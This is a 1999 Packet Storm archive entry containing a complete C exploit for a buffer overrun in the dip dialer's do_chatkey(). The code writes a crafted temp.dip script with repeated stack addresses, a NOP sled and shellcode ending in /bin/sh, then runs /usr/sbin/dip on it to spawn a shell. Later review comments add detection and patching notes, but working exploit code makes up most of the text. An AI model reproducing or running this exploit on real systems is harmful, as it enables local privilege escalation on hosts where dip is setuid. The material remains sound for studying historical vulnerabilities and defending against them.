dip-exploit.sh

1999-08-17T00:00:00
ID PACKETSTORM:15138
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Just a note: don't forget to erase the temp.dip file when you run this  
exploit.  
  
  
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */  
  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <fcntl.h>  
#include <sys/stat.h>  
  
/* Absolute path of the dip binary that main() executes as its last step. */  
#define PATH_DIP "/usr/sbin/dip"  
  
/*  
 * Opaque machine-code payload ending in the literal path "/bin/sh". main()  
 * copies it byte-for-byte into the generated script file. The file header  
 * states the goal is a shell; the bytes are not explained anywhere in this  
 * listing.  
 * NOTE(review): presumably 32-bit x86 code, since esp() in this file uses  
 * %esp/%eax - confirm before writing signatures against it.  
 * For defenders: this byte run with its trailing "/bin/sh" is a fixed string  
 * that can be matched when scanning for copies of this file or of temp.dip.  
 */  
u_char shell[] = /* courtesy of avalon ;) */  
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"  
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"  
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";  
  
/*  
 * Reports the current stack pointer. The inline assembly copies %esp into  
 * %eax and the function has no return statement, so the value only reaches  
 * the caller if the compiler leaves %eax untouched and uses it as the return  
 * register. Flowing off the end of a non-void function and using the result  
 * is undefined in ISO C, and the assembly is x86-specific.  
 */  
u_long esp() { __asm__("movl %esp, %eax"); }  
  
/*  
 * Writes a dip script named temp.dip that holds one oversized "chatkey" line,  
 * then replaces this process with PATH_DIP run on that script.  
 *  
 * Layout of buf as built below:  
 *   0..7     the text "chatkey "  
 *   8..143   one value repeated: addr = esp() - 192 (the 192 is a fixed  
 *            adjustment whose derivation is not given in this file; the range  
 *            assumes a 4-byte u_long - TODO confirm for the build target)  
 *   144..511 filler bytes of value 0x90  
 *   512..    the contents of shell[], followed in buf by a '\n'  
 *  
 * Defensive reading: the file header names the flaw as a buffer overrun in  
 * dip's do_chatkey(), so the durable fix is a length check there (a patched  
 * dip). NOTE(review): impact depends on the privileges dip runs with on the  
 * host - check whether /usr/sbin/dip is setuid and drop the bit if it is not  
 * required. Artifacts to look for: a file named temp.dip in the invoking  
 * user's working directory (nothing in this program removes it), a chatkey  
 * line hundreds of bytes long containing non-printable bytes, and dip started  
 * with a script argument from an unexpected directory.  
 */  
main()  
{  
u_char buf[1024];  
u_long addr;  
int i, f;  
  
/* Script keyword first; the NUL that strcpy writes at buf[8] is overwritten below. */  
strcpy(buf, "chatkey ");  
/* Address value derived from this process's own stack pointer. */  
addr = esp() - 192;  
for (i=8; i<128+16; i+=4)  
*((u_long *) (buf+i)) = addr;  
for (i=128+16; i<512; i++)  
buf[i] = 0x90;  
/* strlen() stops at the first zero byte in shell[]. */  
for (i=0; i<strlen(shell); i++)  
buf[512+i] = shell[i];  
buf[512+i] = '\n';  
  
/* Created owner-only (0600, subject to umask) in the current directory; truncated if it exists. */  
if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {  
perror("temp.dip");  
/* Exit status 0 even though the open failed. */  
exit(0);  
}  
/* The return value of write() is not checked. */  
write(f, buf, 512+i);  
close(f);  
  
/* On success execl() does not return; a failure is not reported and main() simply ends. */  
execl(PATH_DIP, "dip", "temp.dip", (char *)0);  
}  
`